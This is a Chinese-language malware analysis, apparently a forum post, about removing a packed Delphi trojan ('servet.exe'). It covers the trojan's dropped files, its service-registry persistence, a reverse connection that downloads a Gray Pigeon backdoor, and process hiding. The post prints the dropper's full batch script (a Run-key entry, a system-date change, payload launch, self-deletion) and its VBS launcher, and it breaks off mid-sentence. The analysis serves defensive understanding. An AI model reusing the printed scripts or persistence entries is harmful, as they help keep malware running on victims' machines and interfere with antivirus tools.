清除servet.exe

样本来至木蚂蚁社区``有点黄的图标```

其实前星期就分析了``忙着玩游戏``所以懒得写```

今天整理东西的时候翻出来的```西西```

Delphi写的，加了HMYNIS、ASPACK双层硬壳，上周在Visrutotal扫描时过了不少```

运行，释放：

%Systemroot%\system32\servet.exe 29760 字节

并注册为系统服务，实现开机自启：

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,72,00,76,00,65,\
00,74,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="Windows InstallService"
"ObjectName"="LocalSystem"
"Description"="Windows InstallService"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
   00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
   00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\
   05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
   20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\
   00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\
   00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\
   00,01,01,00,00,00,00,00,05,12,00,00,00

随后利用Svchost反弹连接，下载2个木马：

%Systemroot%\system\11.exe 652604 字节，黑防的鸽子``

%Systemroot%\system32\11.exe 719834 字节 VB小毒，MS运行不起来``` - -

那个VB病毒，释放：

%Systemroot%\system32\11.bat 568 字节

内容为：

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v lype /t REG_EXPAND_SZ /d "%systemroot%\avp.exe" /f
set date=%date%
date 2000-01-01
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %system%.\run$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %system%.\ run$.vbs
goto Timeout
goto End
:Next
%systemroot%\system\11.exe
copy %systemroot%\system\run.pif %systemroot%\system32\
for %%f in (%system%.\run$.vbs*) do del %%f
date %date%
RD /S /Q %systemroot%\system\

%Systemroot%\system\11.vbs 137 字节

内容为：

DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C %systemroot%\system\11.bat", 0, TRUE)

其实就是一丘之貉``不过并未见释放avp.exe、 run$.vbs和写启动项```

但确实改了日期，修改为2000-01-01(注意,直接挂卡吧)``

还有那个652604 字节的灰鸽子，汗，还要我自己手工运行```（崩溃啊``）

黑防的灰鸽子，蛮不错的，加了免杀，过Visrutotal的Dr、BD、AVG、Ewdio、麦咖啡、NOD32等等``

注册为系统服务：

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
79,00,73,00,74,00,65,00,6d,00,73,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="smss"
"ObjectName"="LocalSystem"
"Description"="系统关键进程"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
   00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
   00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\
   05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
   20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\
   00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\
   00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\
   00,01,01,00,00,00,00,00,05,12,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Enum]
"0"="Root\\LEGACY_SMSS\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

并使用Hook技术，实现进程隐藏``，哈哈``SSM可不会“坐视不理”：